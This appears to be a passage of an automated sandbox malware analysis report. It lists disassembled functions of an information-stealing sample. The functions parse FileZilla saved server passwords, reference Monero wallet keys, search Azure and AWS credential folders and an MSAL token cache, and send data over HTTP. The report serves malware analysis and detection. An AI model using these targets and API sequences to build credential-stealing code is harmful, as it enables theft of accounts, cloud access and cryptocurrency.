                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC0369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00CC0385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00CC03CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC03DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00CC0419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CC0463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC0532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00CC0562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00CC0571
                          • lstrcat.KERNEL32(?,url: ), ref: 00CC0580
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC0593
                          • lstrcat.KERNEL32(?,00CD1678), ref: 00CC05A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC05B5
                          • lstrcat.KERNEL32(?,00CD167C), ref: 00CC05C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00CC05D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC05E6
                          • lstrcat.KERNEL32(?,00CD1688), ref: 00CC05F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00CC0604
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC0617
                          • lstrcat.KERNEL32(?,00CD1698), ref: 00CC0626
                          • lstrcat.KERNEL32(?,00CD169C), ref: 00CC0635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CD0DB2), ref: 00CC068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 22a7f04dd034935b3eb6051d917e1abbcec97fa02b82f8e712f4a12adca8630c
                          • Instruction ID: 62faef95e2c7c611bc934f14bf27a2c350f84a59386a239f054905dbe0e50e20
                          • Opcode Fuzzy Hash: 22a7f04dd034935b3eb6051d917e1abbcec97fa02b82f8e712f4a12adca8630c
                          • Instruction Fuzzy Hash: 3BD11BB1900208ABCB04EBE5DD9AFFE7338EF54304F54452DF506B6191DE74AA0ADB62
                          Function 00CB5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CB4839
                            • Part of subcall function 00CB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CB4849
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CB59F8
                          • StrCmpCA.SHLWAPI(?,0189E6F8), ref: 00CB5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CB5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0189E6D8,00000000,?,01898D88,00000000,?,00CD1A1C), ref: 00CB5E71
                          • lstrlen.KERNEL32(00000000), ref: 00CB5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00CB5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00CB5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00CB5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CB5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00CB5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CB5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CB5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FBD
                          • HttpOpenRequestA.WININET(00000000,0189E668,?,0189DEC8,00000000,00000000,00400100,00000000), ref: 00CB5BF8
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • InternetCloseHandle.WININET(00000000), ref: 00CB5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: bba90e4ad82ae0592fef104996202fafbe32753583ff6862744fa89c132a34f6
                          • Instruction ID: 1e49416078a8adeaa80d44c68c5e0a517421c1748be373bb3f7576c039476822
                          • Opcode Fuzzy Hash: bba90e4ad82ae0592fef104996202fafbe32753583ff6862744fa89c132a34f6
                          • Instruction Fuzzy Hash: 8B12F77182011CABDB15EBA1DC9AFEEB378BF54704F5041ADF10A62091EF702A4ADF65
                          Function 00CBCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CC8B60: GetSystemTime.KERNEL32(00CD0E1A,018992C8,00CD05AE,?,?,00CB13F9,?,0000001A,00CD0E1A,00000000,?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CC8B86
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CBCF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CBD0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CBD0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD208
                          • lstrcat.KERNEL32(?,00CD1478), ref: 00CBD217
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD22A
                          • lstrcat.KERNEL32(?,00CD147C), ref: 00CBD239
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD24C
                          • lstrcat.KERNEL32(?,00CD1480), ref: 00CBD25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD26E
                          • lstrcat.KERNEL32(?,00CD1484), ref: 00CBD27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD290
                          • lstrcat.KERNEL32(?,00CD1488), ref: 00CBD29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD2B2
                          • lstrcat.KERNEL32(?,00CD148C), ref: 00CBD2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00CBD2D4
                          • lstrcat.KERNEL32(?,00CD1490), ref: 00CBD2E3
                            • Part of subcall function 00CCA820: lstrlen.KERNEL32(00CB4F05,?,?,00CB4F05,00CD0DDE), ref: 00CCA82B
                            • Part of subcall function 00CCA820: lstrcpy.KERNEL32(00CD0DDE,00000000), ref: 00CCA885
                          • lstrlen.KERNEL32(?), ref: 00CBD32A
                          • lstrlen.KERNEL32(?), ref: 00CBD339
                            • Part of subcall function 00CCAA70: StrCmpCA.SHLWAPI(01899AD0,00CBA7A7,?,00CBA7A7,01899AD0), ref: 00CCAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00CBD3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 380d4f033c9968c4ab9fa7206563a44e9e1f98e72ff5511992e0ea181978caf5
                          • Instruction ID: fd24745d161fe6e533759a7df0e47aabff62c0f98f82b387e6d46804a7a3830a
                          • Opcode Fuzzy Hash: 380d4f033c9968c4ab9fa7206563a44e9e1f98e72ff5511992e0ea181978caf5
                          • Instruction Fuzzy Hash: 9CE13EB1910108AFCB04EBA1DD9AFEE7378BF54304F544169F507B6091DE35AE0AEB62
                          Function 00CBC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0189CDC8,00000000,?,00CD144C,00000000,?,?), ref: 00CBCA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CBCA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CBCA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CBCAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CBCAD9
                          • StrStrA.SHLWAPI(?,0189CE40,00CD0B52), ref: 00CBCAF7
                          • StrStrA.SHLWAPI(00000000,0189CEB8), ref: 00CBCB1E
                          • StrStrA.SHLWAPI(?,0189D568,00000000,?,00CD1458,00000000,?,00000000,00000000,?,01899A30,00000000,?,00CD1454,00000000,?), ref: 00CBCCA2
                          • StrStrA.SHLWAPI(00000000,0189D5A8), ref: 00CBCCB9
                            • Part of subcall function 00CBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CBC871
                            • Part of subcall function 00CBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CBC87C
                          • StrStrA.SHLWAPI(?,0189D5A8,00000000,?,00CD145C,00000000,?,00000000,01899AB0), ref: 00CBCD5A
                          • StrStrA.SHLWAPI(00000000,01899CB0), ref: 00CBCD71
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B46), ref: 00CBC943
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B47), ref: 00CBC957
                            • Part of subcall function 00CBC820: lstrcat.KERNEL32(?,00CD0B4E), ref: 00CBC978
                          • lstrlen.KERNEL32(00000000), ref: 00CBCE44
                          • CloseHandle.KERNEL32(00000000), ref: 00CBCE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: dfae444034f07f3cd48e2a326fd6dc4c403c012a1306d7189a74729617e0b9a4
                          • Instruction ID: 1909fc0f834a35bf3588ff4bff5bfaff0ed2bc490a3f960da42c7590e7bff8b4
                          • Opcode Fuzzy Hash: dfae444034f07f3cd48e2a326fd6dc4c403c012a1306d7189a74729617e0b9a4
                          • Instruction Fuzzy Hash: DFE119B191010CAFDB14EBA1DC9AFEEB778AF54304F44416DF106B6191EF306A4ADB62
                          Function 00CC8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0189B590,00000000,00020019,00000000,00CD05B6), ref: 00CC83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CC8426
                          • wsprintfA.USER32 ref: 00CC8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CC847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CC8499
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: bb80917c2e4094722c9831b21faa12915e936f7c395457fd41a142ac7f9f9c16
                          • Instruction ID: f08848759e2d949eaedf4d9b084f7ddad3310103ad6de41c080a89766920b634
                          • Opcode Fuzzy Hash: bb80917c2e4094722c9831b21faa12915e936f7c395457fd41a142ac7f9f9c16
                          • Instruction Fuzzy Hash: 9E81EBB191011CAFDB28DB55CC95FEAB7B8BF48704F008299E109A6190DF716F89CF95
                          Function 00CC4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CC8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00CC4DCD
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC492C
                            • Part of subcall function 00CC4910: FindFirstFileA.KERNEL32(?,?), ref: 00CC4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00CC4E59
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FDC), ref: 00CC4971
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD0FE0), ref: 00CC4987
                            • Part of subcall function 00CC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CC4B7D
                            • Part of subcall function 00CC4910: FindClose.KERNEL32(000000FF), ref: 00CC4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00CC4EE5
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC49B0
                            • Part of subcall function 00CC4910: StrCmpCA.SHLWAPI(?,00CD08D2), ref: 00CC49C5
                            • Part of subcall function 00CC4910: wsprintfA.USER32 ref: 00CC49E2
                            • Part of subcall function 00CC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CC4A1E
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,0189E5E8), ref: 00CC4A4A
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,00CD0FF8), ref: 00CC4A5C
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,?), ref: 00CC4A70
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,00CD0FFC), ref: 00CC4A82
                            • Part of subcall function 00CC4910: lstrcat.KERNEL32(?,?), ref: 00CC4A96
                            • Part of subcall function 00CC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CC4AAC
                            • Part of subcall function 00CC4910: DeleteFileA.KERNEL32(?), ref: 00CC4B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: adb69cef23af67664247b4f99b739accf671c3d2487b9cb802503e771e2a1835
                          • Instruction ID: d8f0b6b464dc8e2ea60ce359690e7f709f8c6bc7670b9a91423852f445e71fc1
                          • Opcode Fuzzy Hash: adb69cef23af67664247b4f99b739accf671c3d2487b9cb802503e771e2a1835
                          • Instruction Fuzzy Hash: 7041A5B99402086BD714F760EC57FED3338AB64704F4444A8B649A61C1EEF46BCDDB92
                          Function 00CC9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CC906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
